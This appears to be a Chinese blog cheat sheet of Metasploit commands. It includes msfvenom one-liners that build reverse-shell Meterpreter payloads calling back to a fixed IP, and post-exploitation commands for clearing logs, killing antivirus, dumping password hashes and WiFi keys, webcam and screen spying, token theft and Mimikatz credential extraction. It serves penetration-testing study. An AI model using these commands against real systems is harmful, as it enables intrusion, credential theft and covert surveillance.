当前位置:   article > 正文

Metasploit(最全命令讲解)_metasploit刷新配置命令

metasploit刷新配置命令
文件目录
  1. data目录(msf用于一些可以编辑的文件)
  2. documentation目录(msf相关文档,工具介绍)
  3. lib目录(静态链接库,msf中的一些代码)
  4. modules目录(msf模块)
  5. tools目录(msf小工具模块)
基础使用
  1. msfdb init:初始化,并启动数据库
  2. msfconsole:开启msf
  3. db_status:查看msf数据库状态
  4. 可以使用kage实现界面化
  5. help:查看帮助
  6. exit:退出msf
  7. show:进行罗列模块
  8. search:搜索模块
  9. use:使用模块
  10. back:返回上一级
  11. info:查看模块信息
  12. show options:查看配置
  13. set:设置一个值
  14. exploit:执行模块
  15. jobs:查看后台工作
  16. kill:杀死工作
  17. threads:线程(例如设置10个线程 set threads 10
消息收集
  1. arp扫描:auxiliary/scanner/discovery/arp_sweep
  2. udp扫描:auxiliary/scanner/discovery/udp_sweep
  3. 端口扫描:auxiliary/scanner/portscan/tcp
exploit
永恒之蓝(17-010
msfvenom
  1. 常用参数
  2. msfvenom -l:查看列表
  3. msfvenom -p:指定payload
  4. msfvenom -f:指定输出格式
  5. msfvenom -e:指定编码方式
  6. msfvenom -i:指定编码次数
  7. windowsDemo:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
  8. -e x86/shikata_ga_nai -i 5 -f exe > 1.exe
  9. linuxDemo: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
  10. -f elf > 1.elf (linux中可执行文件后缀为.elf)
Meterpreter
  1. 基础操作
  2. background:返回
  3. sessions -l:查看所有会话信息
  4. sessions -i id号:与指定的会话进行交互(id号为存在的会话 输入哪个id就可以切换到哪个会话状态下)
  5. pwd:查看目标当前目录
  6. lpwd:查看本地当前目录
  7. cd:切换到目标的指定目录
  8. lcd:切换到本地指定目录(l为localhost)
  9. ls:列出目标的文件
  10. lls:列出本机当前的文件
  11. clearev:清理痕迹
  12. download 目标文件名:将目标文件下载到本地
  13. upload 目标文件名:将文件上传到目标
  14. execute 参数:在目标执行命令的功能(-h功能查看有哪些参数)
  15. execute -f 文件名(例:1.exe) -H:不显示执行情况,创建一个进程(在目标文件上执行文件,隐藏执行)
  16. ps:列出目标进程
  17. getuid:查看当前用户的身份
  18. getprivs:查看当前用户的权限
  19. migrate 进程号:进程迁移命令(权限就会成为该进程号的权限)
  20. getpid:查看木马进程
  21. shell:进入终端环境
  22. (1)chcp 65001:更改编码,防止乱码(前提是进入终端环境后执行该命令)
  23. exit:退出终端环境
  24. idletime:查看目标服务器空闲时间
  25. sysinfo:查看目标信息
  26. kill pid号:杀死目标的一个进程
  27. shutdown:关机
  28. reboot:重启
  29. netstat:查看网络连接情况
  30. getsystem:尝试提权(一般低版本才可以成功,高版本需要配合其他才能成功)
信息收集 (大部分使用 run 运行)
  1. 模块学习,可以罗列出来选择需要的模块使用
  2. run killav:杀死杀毒软件(了解一下就行)
  3. run hashdump:导出目标机的密码
  4. run post/windows/wlan/wlan_profile:查看wifi密码
  5. run vnc:实时屏幕监控
  6. run webcam:开启一个摄像头
  7. run post/windows/gather/checkvm:查看当前主机是否为虚拟机
  8. run post/windows/gather/enum_computers:枚举域内的主机
  9. run post/windows/manage/enable_rdp:开启目标的3389
  10. run getgui -e:连接对方远程桌面
  11. help:各种命令罗列
incognito (令牌窃取工具)
  1. load incognito:加载incognito工具
  2. list_tokens -u:列出可以模拟的令牌
  3. impersonate_token 令牌名:窃取一个指定令牌(令牌名例如:ROOT-5DE52AC98B\\Administrator,需要加俩
  4. 个\,若令牌名之间有空格,可以加"",将令牌名写入,可以试一试,不一定成功)
mimikatz
  1. load mimikatz:加载该工具
  2. wdigest:抓取明文密码
msf 图形化界面
  1. msfdb init:开启数据库
  2. armitage:启用图形化界面
msf 更新
  1. apt update;apt install metasploit-framework:更新
  2. 手动加入一些插件去exploitdb:网址https://www.exploit-db.com/

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/456762
推荐阅读
相关标签
  

闽ICP备14008679号